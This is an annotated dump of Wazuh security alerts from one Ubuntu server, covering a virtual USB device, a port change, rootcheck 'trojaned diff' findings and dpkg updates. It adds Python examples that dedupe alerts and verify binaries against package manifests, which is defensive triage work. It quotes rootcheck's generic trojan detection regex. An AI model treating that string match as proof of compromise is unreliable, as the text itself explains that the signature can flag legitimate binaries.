rule.description: Attached USB Storage Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 81101 Numeric ID of the detection rule that fired.
rule.firedtimes: 1 Running count of how many times this rule has fired on this manager. A fast-climbing value means repetitive behaviour.
rule.mail: False True if the rule is flagged to send an email alert. Rarely used now, but still a hint that the rule author considered it high value.
rule.groups: ['usb'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gpg13: ['4.8'] GPG13 (UK Good Practice Guide 13, protective monitoring) control mapping, the same idea as the PCI DSS and NIST fields below.
agent.id: 000 Wazuh agent ID. 000 is reserved for the manager itself, so this alert comes from the manager's own local logs, not from an enrolled agent.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533320.0 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24T22:21:59.791313+00:00 server1 kernel: usb 2-2.1: New USB device found, idVendor=0e0f, idProduct=0008, bcdDevice= 1.00 The complete raw log message before parsing – last‑resort truth for deep dives. The idVendor/idProduct pair identifies the device class: 0e0f is VMware's USB vendor ID, so on a VM this is usually a virtual device presented by the hypervisor rather than a stick someone plugged in. Confirm with lsusb on the host before escalating.
predecoder.program_name: kernel Process that originally wrote the log line (e.g., sshd, sudo).
predecoder.timestamp: 2025-04-24T22:21:59.791313+00:00 Timestamp the pre-decoder pulled out of the raw log line, i.e. when the source wrote it, as opposed to when the manager processed it. Compare the two when you suspect log delay or replay.
decoder.parent: kernel Parent decoder used – for nested parsing.
decoder.name: kernel Name of the Wazuh decoder that parsed this raw log.
data.id: usb Field the kernel decoder extracted from the message; here the subsystem token ('usb') that prefixes the kernel line.
location: /var/log/kern.log Which log source produced the event (e.g., sysmon, auditd).
rule.description: Attached USB Storage Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 81101 Numeric ID of the detection rule that fired.
rule.firedtimes: 2 Running count of how many times this rule has fired on this manager. A fast-climbing value means repetitive behaviour.
rule.mail: False True if the rule is flagged to send an email alert. Rarely used now, but still a hint that the rule author considered it high value.
rule.groups: ['usb'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gpg13: ['4.8'] GPG13 (UK Good Practice Guide 13, protective monitoring) control mapping, the same idea as the PCI DSS and NIST fields below.
agent.id: 000 Wazuh agent ID. 000 is reserved for the manager itself, so this alert comes from the manager's own local logs, not from an enrolled agent.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533320.266 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24T22:21:59.791313+00:00 server1 kernel: usb 2-2.1: New USB device found, idVendor=0e0f, idProduct=0008, bcdDevice= 1.00 The complete raw log message before parsing – last‑resort truth for deep dives.
predecoder.program_name: kernel Process that originally wrote the log line (e.g., sshd, sudo).
predecoder.timestamp: 2025-04-24T22:21:59.791313+00:00 Timestamp the pre-decoder pulled out of the raw log line, i.e. when the source wrote it, as opposed to when the manager processed it.
decoder.parent: kernel Parent decoder used – for nested parsing.
decoder.name: kernel Name of the Wazuh decoder that parsed this raw log.
data.id: usb Field the kernel decoder extracted from the message; here the subsystem token ('usb') that prefixes the kernel line.
location: /var/log/syslog Which log source produced the event (e.g., sysmon, auditd). Note the identical kernel line was also collected from /var/log/kern.log: one message written to two monitored files yields two alerts, so dedupe on timestamp and device before counting insertions.
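The two USB alerts above are one physical event seen through two log files. The following Python is an added example, not Wazuh code and not part of the original alert dump: it parses "New USB device found" kernel lines the way the decoder does, collapses copies of the same event collected from different files, and flags vendor:product pairs outside an allowlist. The allowlist and the second sample line (a hypothetical 0781:5583 device) are constructed for the example.

```python
import re
from collections import OrderedDict

# Constructed sample: the kernel line from the alerts above as collected from two
# monitored files, plus a hypothetical second device on another port.
SAMPLE_EVENTS = [
    ("/var/log/kern.log", "2025-04-24T22:21:59.791313+00:00 server1 kernel: usb 2-2.1: "
                          "New USB device found, idVendor=0e0f, idProduct=0008, bcdDevice= 1.00"),
    ("/var/log/syslog",   "2025-04-24T22:21:59.791313+00:00 server1 kernel: usb 2-2.1: "
                          "New USB device found, idVendor=0e0f, idProduct=0008, bcdDevice= 1.00"),
    ("/var/log/kern.log", "2025-04-24T22:25:10.000001+00:00 server1 kernel: usb 1-1: "
                          "New USB device found, idVendor=0781, idProduct=5583, bcdDevice= 1.00"),
]

# Mirrors the shape of the kernel message: syslog timestamp, host, "kernel:", then
# the usb subsystem token, the bus-port path and the three identifiers.
USB_RE = re.compile(
    r"^(?P<ts>\S+) (?P<host>\S+) kernel: usb (?P<port>[\d.-]+): New USB device found, "
    r"idVendor=(?P<vid>[0-9a-f]{4}), idProduct=(?P<pid>[0-9a-f]{4}), bcdDevice=\s*(?P<rev>[\d.]+)"
)

# Hypothetical allowlist of vendor:product pairs this fleet is expected to see
# (0e0f is VMware's vendor ID, i.e. hypervisor-provided virtual devices).
ALLOWED = {("0e0f", "0008")}


def parse_usb_line(line):
    """Return the decoded fields for a 'New USB device found' line, or None."""
    m = USB_RE.match(line)
    return m.groupdict() if m else None


def triage(events, allowed=ALLOWED):
    """Collapse duplicate collections of one insertion and mark unexpected devices.

    events: iterable of (location, raw_line). Two lines with the same host,
    timestamp and port are the same physical event seen via different files.
    """
    seen = OrderedDict()
    for location, line in events:
        rec = parse_usb_line(line)
        if rec is None:
            continue                      # not a device-insertion line
        key = (rec["host"], rec["ts"], rec["port"])
        if key in seen:                   # duplicate via another log file
            seen[key]["locations"].append(location)
            continue
        rec["locations"] = [location]
        rec["allowed"] = (rec["vid"], rec["pid"]) in allowed
        seen[key] = rec
    return list(seen.values())


if __name__ == "__main__":
    for dev in triage(SAMPLE_EVENTS):
        flag = "ok" if dev["allowed"] else "UNEXPECTED"
        print(f"{dev['ts']} {dev['host']} usb {dev['port']} "
              f"{dev['vid']}:{dev['pid']} via {dev['locations']} -> {flag}")
```

Run against a day of kernel lines, this yields one row per insertion instead of one per log file, and the allowlist turns a generic "USB attached" alert into "a device we have never seen before attached".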
rule.description: Listened ports status (netstat) changed (new port opened or closed). Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 533 Numeric ID of the detection rule that fired.
rule.firedtimes: 1 Running count of how many times this rule has fired on this manager. A fast-climbing value means repetitive behaviour.
rule.mail: False True if the rule is flagged to send an email alert. Rarely used now, but still a hint that the rule author considered it high value.
rule.groups: ['ossec'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.2.7', '10.6.1'] PCI DSS mapping – card‑holder data rules.
rule.gpg13: ['10.1'] GPG13 (UK Good Practice Guide 13, protective monitoring) control mapping, the same idea as the PCI DSS and NIST fields.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.14', 'AU.6'] NIST 800‑53 mapping – US Fed controls.
rule.description: Host-based anomaly detection event (rootcheck). Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 510 Numeric ID of the detection rule that fired.
rule.firedtimes: 1 Running count of how many times this rule has fired on this manager. A fast-climbing value means repetitive behaviour.
rule.mail: False True if the rule is flagged to send an email alert. Rarely used now, but still a hint that the rule author considered it high value.
rule.groups: ['ossec', 'rootcheck'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1'] PCI DSS mapping – card‑holder data rules.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
agent.id: 000 Wazuh agent ID. 000 is reserved for the manager itself, so this finding is about the manager's own filesystem, not an enrolled agent's.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533323.14629 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: Trojaned version of file '/bin/diff' detected. Signature used: 'bash|^/bin/sh|file\.h|proc\.h|/dev/[^n]|^/bin/.*sh' (Generic). The complete raw log message before parsing – last‑resort truth for deep dives. Here rootcheck's generic trojan signature matched one of those strings inside the diff binary. The signature is string-based, so before treating this as a compromise verify the file against its package manifest (dpkg -V diffutils, or debsums) and compare its hash with the same path on a known-clean host of the same release.
decoder.name: rootcheck Name of the Wazuh decoder that parsed this raw log.
data.title: Trojaned version of file detected. Short title some decoders add – usually informational.
data.file: /bin/diff Generic file path referenced in the log.
location: rootcheck Which log source produced the event (e.g., sysmon, auditd).
rule.description: Host-based anomaly detection event (rootcheck). Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 510 Numeric ID of the detection rule that fired.
rule.firedtimes: 2 Running count of how many times this rule has fired on this manager. A fast-climbing value means repetitive behaviour.
rule.mail: False True if the rule is flagged to send an email alert. Rarely used now, but still a hint that the rule author considered it high value.
rule.groups: ['ossec', 'rootcheck'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1'] PCI DSS mapping – card‑holder data rules.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
agent.id: 000 Wazuh agent ID. 000 is reserved for the manager itself, so this finding is about the manager's own filesystem, not an enrolled agent's.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533323.15004 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: Trojaned version of file '/usr/bin/diff' detected. Signature used: 'bash|^/bin/sh|file\.h|proc\.h|/dev/[^n]|^/bin/.*sh' (Generic). The complete raw log message before parsing – last‑resort truth for deep dives. This is the same binary as the previous alert: on Ubuntu (merged /usr, visible from the ubuntu0.x package versions later on this page) /bin is a symlink to /usr/bin, so /bin/diff and /usr/bin/diff are one file and one finding, not two.
decoder.name: rootcheck Name of the Wazuh decoder that parsed this raw log.
data.title: Trojaned version of file detected. Short title some decoders add – usually informational.
data.file: /usr/bin/diff Generic file path referenced in the log.
location: rootcheck Which log source produced the event (e.g., sysmon, auditd).
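The two rootcheck alerts above are what a practitioner has to adjudicate: a string-signature hit on diff, reported twice through the /bin and /usr/bin aliases. The following Python is an added example, not Wazuh's rootcheck and not from the original page. It does what dpkg -V does by hand: canonicalises merged-/usr paths so the two alerts collapse to one file, then compares the file's MD5 with the package's md5sums manifest. The manifest text, file contents and package name are constructed stand-ins so the example runs offline; real input is /var/lib/dpkg/info/<pkg>.md5sums and the file on disk.

```python
import hashlib
from pathlib import PurePosixPath

# Constructed stand-ins for two files of a package and the md5sums manifest dpkg
# ships for them ("<md5hex>  <path relative to />" per line). The hashes are
# derived from the constructed bytes so the manifest is internally consistent.
FAKE_DIFF_BYTES = b"\x7fELF constructed stand-in for /usr/bin/diff\n"
FAKE_CMP_BYTES = b"\x7fELF constructed stand-in for /usr/bin/cmp\n"


def md5hex(data):
    # dpkg's manifests are MD5: good for catching a modified file, not a
    # tamper-proof control, since root can rewrite the manifest as well.
    return hashlib.md5(data).hexdigest()


DIFFUTILS_MD5SUMS = (
    f"{md5hex(FAKE_DIFF_BYTES)}  usr/bin/diff\n"
    f"{md5hex(FAKE_CMP_BYTES)}  usr/bin/cmp\n"
)

# Constructed in-memory filesystem standing in for open(path, 'rb').read().
FAKE_FS = {"/usr/bin/diff": FAKE_DIFF_BYTES, "/usr/bin/cmp": FAKE_CMP_BYTES}

# On a merged-/usr system these top-level directories are symlinks into /usr.
MERGED_USR_ALIASES = {"/bin": "/usr/bin", "/sbin": "/usr/sbin", "/lib": "/usr/lib"}


def canonical(path):
    """Map /bin/x, /sbin/x, /lib/x to their /usr/... form; leave other paths alone."""
    p = PurePosixPath(path)
    for alias, target in MERGED_USR_ALIASES.items():
        a = PurePosixPath(alias)
        if p == a or a in p.parents:
            return str(PurePosixPath(target) / p.relative_to(a))
    return str(p)


def parse_md5sums(text):
    """Parse a dpkg md5sums manifest into {absolute_path: md5hex}."""
    manifest = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        digest, rel = line.split(None, 1)      # dpkg separates with two spaces
        manifest["/" + rel.strip()] = digest
    return manifest


def verify_flagged(flagged_paths, manifest_text, read_file):
    """For each path rootcheck flagged, report ok / MISMATCH / not-in-manifest.

    read_file(path) -> bytes is injected so the check can run on an image or a
    forensic copy as well as the live host.
    """
    manifest = parse_md5sums(manifest_text)
    results = {}
    for raw in flagged_paths:
        path = canonical(raw)
        if path in results:                    # /bin/diff and /usr/bin/diff: same file
            continue
        expected = manifest.get(path)
        if expected is None:
            results[path] = "not-in-manifest"  # not owned by this package: check dpkg -S
            continue
        results[path] = "ok" if md5hex(read_file(path)) == expected else "MISMATCH"
    return results


if __name__ == "__main__":
    flagged = ["/bin/diff", "/usr/bin/diff"]   # the two rootcheck alerts above
    print(verify_flagged(flagged, DIFFUTILS_MD5SUMS, FAKE_FS.__getitem__))
```

An "ok" result means the bytes on disk are what the package shipped and the generic signature simply matched a legitimate build; a "MISMATCH" is the point at which the alert becomes an incident and the host should be isolated rather than cleaned.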
rule.description: Dpkg (Debian Package) half configured. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 2904 Numeric ID of the detection rule that fired.
rule.firedtimes: 1 Running count of how many times this rule has fired on this manager. A fast-climbing value means repetitive behaviour.
rule.mail: False True if the rule is flagged to send an email alert. Rarely used now, but still a hint that the rule author considered it high value.
rule.groups: ['syslog', 'dpkg', 'config_changed'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1', '10.2.7'] PCI DSS mapping – card‑holder data rules.
rule.gpg13: ['4.10'] GPG13 (UK Good Practice Guide 13, protective monitoring) control mapping, the same idea as the PCI DSS and NIST fields.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6', 'AU.14'] NIST 800‑53 mapping – US Fed controls.
agent.id: 000 Wazuh agent ID. 000 is reserved for the manager itself, so this alert comes from the manager's own local logs, not from an enrolled agent.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533374.15387 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24 22:22:53 status half-configured linux-libc-dev:amd64 6.8.0-57.59 The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: dpkg-decoder Name of the Wazuh decoder that parsed this raw log.
data.dpkg_status: status half-configured dpkg state transition recorded in dpkg.log, not the result of a query. 'half-configured' is a normal transient state while a package's maintainer scripts run; it only matters if no 'installed' line follows for the same package and version.
data.package: linux-libc-dev Package name involved (apt/yum). Good for vuln tracking.
data.arch: amd64 Package architecture from dpkg ('all' for architecture-independent packages). Needed when matching the package to an advisory or patch.
data.version: 6.8.0-57.59 Package version from the dpkg log line. Pair with data.package to see exactly what landed on the box.
location: /var/log/dpkg.log Which log source produced the event (e.g., sysmon, auditd).
rule.description: Dpkg (Debian Package) half configured. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 2904 Numeric ID of the detection rule that fired.
rule.firedtimes: 2 Running count of how many times this rule has fired on this manager. A fast-climbing value means repetitive behaviour.
rule.mail: False True if the rule is flagged to send an email alert. Rarely used now, but still a hint that the rule author considered it high value.
rule.groups: ['syslog', 'dpkg', 'config_changed'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1', '10.2.7'] PCI DSS mapping – card‑holder data rules.
rule.gpg13: ['4.10'] GPG13 (UK Good Practice Guide 13, protective monitoring) control mapping, the same idea as the PCI DSS and NIST fields.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6', 'AU.14'] NIST 800‑53 mapping – US Fed controls.
agent.id: 000 Wazuh agent ID. 000 is reserved for the manager itself, so this alert comes from the manager's own local logs, not from an enrolled agent.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533374.15874 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24 22:22:54 status half-configured linux-tools-common:all 6.8.0-57.59 The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: dpkg-decoder Name of the Wazuh decoder that parsed this raw log.
data.dpkg_status: status half-configured dpkg state transition recorded in dpkg.log, not the result of a query. 'half-configured' is a normal transient state while a package's maintainer scripts run; it only matters if no 'installed' line follows for the same package and version.
data.package: linux-tools-common Package name involved (apt/yum). Good for vuln tracking.
data.arch: all Package architecture from dpkg; 'all' means an architecture-independent package (scripts, data), so there is no CPU-specific build to match.
data.version: 6.8.0-57.59 Package version from the dpkg log line. Pair with data.package to see exactly what landed on the box.
location: /var/log/dpkg.log Which log source produced the event (e.g., sysmon, auditd).
rule.description: Dpkg (Debian Package) half configured. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 2904 Numeric ID of the detection rule that fired.
rule.firedtimes: 3 Running count of how many times this rule has fired on this manager. A fast-climbing value means repetitive behaviour.
rule.mail: False True if the rule is flagged to send an email alert. Rarely used now, but still a hint that the rule author considered it high value.
rule.groups: ['syslog', 'dpkg', 'config_changed'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1', '10.2.7'] PCI DSS mapping – card‑holder data rules.
rule.gpg13: ['4.10'] GPG13 (UK Good Practice Guide 13, protective monitoring) control mapping, the same idea as the PCI DSS and NIST fields.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6', 'AU.14'] NIST 800‑53 mapping – US Fed controls.
agent.id: 000 Wazuh agent ID. 000 is reserved for the manager itself, so this alert comes from the manager's own local logs, not from an enrolled agent.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533376.16365 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24 22:22:54 status half-configured linux-libc-dev:amd64 6.8.0-58.60 The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: dpkg-decoder Name of the Wazuh decoder that parsed this raw log.
data.dpkg_status: status half-configured dpkg state transition recorded in dpkg.log, not the result of a query. 'half-configured' is a normal transient state while a package's maintainer scripts run; it only matters if no 'installed' line follows for the same package and version.
data.package: linux-libc-dev Package name involved (apt/yum). Good for vuln tracking.
data.arch: amd64 Package architecture from dpkg ('all' for architecture-independent packages). Needed when matching the package to an advisory or patch.
data.version: 6.8.0-58.60 Package version from the dpkg log line. Pair with data.package to see exactly what landed on the box.
location: /var/log/dpkg.log Which log source produced the event (e.g., sysmon, auditd).
agent.id: 000 Wazuh agent ID. 000 is reserved for the manager itself, so this alert comes from the manager's own local logs, not from an enrolled agent.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533376.16852 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24 22:22:54 status installed linux-libc-dev:amd64 6.8.0-58.60 The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: dpkg-decoder Name of the Wazuh decoder that parsed this raw log.
data.dpkg_status: status installed dpkg state transition recorded in dpkg.log. 'installed' is the terminal state that closes out the earlier 'half-configured' line for this package and version.
data.package: linux-libc-dev Package name involved (apt/yum). Good for vuln tracking.
data.arch: amd64 Package architecture from dpkg ('all' for architecture-independent packages). Needed when matching the package to an advisory or patch.
data.version: 6.8.0-58.60 Package version from the dpkg log line. Pair with data.package to see exactly what landed on the box.
location: /var/log/dpkg.log Which log source produced the event (e.g., sysmon, auditd).
agent.id: 000 Wazuh agent ID. 000 is reserved for the manager itself, so this alert comes from the manager's own local logs, not from an enrolled agent.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533376.17325 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24 22:22:54 status installed linux-tools-common:all 6.8.0-58.60 The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: dpkg-decoder Name of the Wazuh decoder that parsed this raw log.
data.dpkg_status: status installed dpkg state transition recorded in dpkg.log. 'installed' is the terminal state that closes out the earlier 'half-configured' line for this package and version.
data.package: linux-tools-common Package name involved (apt/yum). Good for vuln tracking.
data.arch: all Package architecture from dpkg; 'all' means an architecture-independent package (scripts, data), so there is no CPU-specific build to match.
data.version: 6.8.0-58.60 Package version from the dpkg log line. Pair with data.package to see exactly what landed on the box.
location: /var/log/dpkg.log Which log source produced the event (e.g., sysmon, auditd).
rule.description: Dpkg (Debian Package) half configured. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 2904 Numeric ID of the detection rule that fired.
rule.firedtimes: 4 Running count of how many times this rule has fired on this manager. A fast-climbing value means repetitive behaviour.
rule.mail: False True if the rule is flagged to send an email alert. Rarely used now, but still a hint that the rule author considered it high value.
rule.groups: ['syslog', 'dpkg', 'config_changed'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1', '10.2.7'] PCI DSS mapping – card‑holder data rules.
rule.gpg13: ['4.10'] GPG13 (UK Good Practice Guide 13, protective monitoring) control mapping, the same idea as the PCI DSS and NIST fields.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6', 'AU.14'] NIST 800‑53 mapping – US Fed controls.
agent.id: 000 Wazuh agent ID. 000 is reserved for the manager itself, so this alert comes from the manager's own local logs, not from an enrolled agent.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533376.17802 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24 22:22:54 status half-configured linux-tools-common:all 6.8.0-58.60 The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: dpkg-decoder Name of the Wazuh decoder that parsed this raw log.
data.dpkg_status: status half-configured dpkg state transition recorded in dpkg.log, not the result of a query. 'half-configured' is a normal transient state while a package's maintainer scripts run; it only matters if no 'installed' line follows for the same package and version.
data.package: linux-tools-common Package name involved (apt/yum). Good for vuln tracking.
data.arch: all Package architecture from dpkg; 'all' means an architecture-independent package (scripts, data), so there is no CPU-specific build to match.
data.version: 6.8.0-58.60 Package version from the dpkg log line. Pair with data.package to see exactly what landed on the box.
location: /var/log/dpkg.log Which log source produced the event (e.g., sysmon, auditd).
rule.description: Dpkg (Debian Package) half configured. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 2904 Numeric ID of the detection rule that fired.
rule.firedtimes: 5 Running count of how many times this rule has fired on this manager. A fast-climbing value means repetitive behaviour.
rule.mail: False True if the rule is flagged to send an email alert. Rarely used now, but still a hint that the rule author considered it high value.
rule.groups: ['syslog', 'dpkg', 'config_changed'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1', '10.2.7'] PCI DSS mapping – card‑holder data rules.
rule.gpg13: ['4.10'] GPG13 (UK Good Practice Guide 13, protective monitoring) control mapping, the same idea as the PCI DSS and NIST fields.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6', 'AU.14'] NIST 800‑53 mapping – US Fed controls.
agent.id: 000 Wazuh agent ID. 000 is reserved for the manager itself, so this alert comes from the manager's own local logs, not from an enrolled agent.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533376.18293 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24 22:22:54 status half-configured man-db:amd64 2.12.0-4build2 The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: dpkg-decoder Name of the Wazuh decoder that parsed this raw log.
data.dpkg_status: status half-configured dpkg state transition recorded in dpkg.log, not the result of a query. 'half-configured' is a normal transient state while a package's maintainer scripts run; it only matters if no 'installed' line follows for the same package and version.
data.package: man-db Package name involved (apt/yum). Good for vuln tracking.
data.arch: amd64 Package architecture from dpkg ('all' for architecture-independent packages). Needed when matching the package to an advisory or patch.
data.version: 2.12.0-4build2 Package version from the dpkg log line. Pair with data.package to see exactly what landed on the box.
location: /var/log/dpkg.log Which log source produced the event (e.g., sysmon, auditd).
agent.id: 000 Wazuh agent ID. 000 is reserved for the manager itself, so this alert comes from the manager's own local logs, not from an enrolled agent.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533376.18770 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24 22:22:56 status installed man-db:amd64 2.12.0-4build2 The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: dpkg-decoder Name of the Wazuh decoder that parsed this raw log.
data.dpkg_status: status installed dpkg state transition recorded in dpkg.log. 'installed' is the terminal state that closes out the earlier 'half-configured' line for this package and version.
data.package: man-db Package name involved (apt/yum). Good for vuln tracking.
data.arch: amd64 Package architecture from dpkg ('all' for architecture-independent packages). Needed when matching the package to an advisory or patch.
data.version: 2.12.0-4build2 Package version from the dpkg log line. Pair with data.package to see exactly what landed on the box.
location: /var/log/dpkg.log Which log source produced the event (e.g., sysmon, auditd).
rule.description: Dpkg (Debian Package) half configured. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 2904 Numeric ID of the detection rule that fired.
rule.firedtimes: 6 Running count of how many times this rule has fired on this manager. A fast-climbing value means repetitive behaviour.
rule.mail: False True if the rule is flagged to send an email alert. Rarely used now, but still a hint that the rule author considered it high value.
rule.groups: ['syslog', 'dpkg', 'config_changed'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1', '10.2.7'] PCI DSS mapping – card‑holder data rules.
rule.gpg13: ['4.10'] GPG13 (UK Good Practice Guide 13, protective monitoring) control mapping, the same idea as the PCI DSS and NIST fields.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6', 'AU.14'] NIST 800‑53 mapping – US Fed controls.
agent.id: 000 Wazuh agent ID. 000 is reserved for the manager itself, so this alert comes from the manager's own local logs, not from an enrolled agent.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533382.19233 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24 22:23:00 status half-configured libarchive13t64:amd64 3.7.2-2ubuntu0.3 The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: dpkg-decoder Name of the Wazuh decoder that parsed this raw log.
data.dpkg_status: status half-configured dpkg state transition recorded in dpkg.log, not the result of a query. 'half-configured' is a normal transient state while a package's maintainer scripts run; it only matters if no 'installed' line follows for the same package and version.
data.package: libarchive13t64 Package name involved (apt/yum). Good for vuln tracking.
data.arch: amd64 Package architecture from dpkg ('all' for architecture-independent packages). Needed when matching the package to an advisory or patch.
data.version: 3.7.2-2ubuntu0.3 Package version from the dpkg log line. Pair with data.package to see exactly what landed on the box.
location: /var/log/dpkg.log Which log source produced the event (e.g., sysmon, auditd).
rule.description: Dpkg (Debian Package) half configured. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 2904 Numeric ID of the detection rule that fired.
rule.firedtimes: 7 Running count of how many times this rule has fired on this manager. A fast-climbing value means repetitive behaviour.
rule.mail: False True if the rule is flagged to send an email alert. Rarely used now, but still a hint that the rule author considered it high value.
rule.groups: ['syslog', 'dpkg', 'config_changed'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1', '10.2.7'] PCI DSS mapping – card‑holder data rules.
rule.gpg13: ['4.10'] GPG13 (UK Good Practice Guide 13, protective monitoring) control mapping, the same idea as the PCI DSS and NIST fields.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6', 'AU.14'] NIST 800‑53 mapping – US Fed controls.
agent.id: 000 Wazuh agent ID. 000 is reserved for the manager itself, so this alert comes from the manager's own local logs, not from an enrolled agent.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533382.19732 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
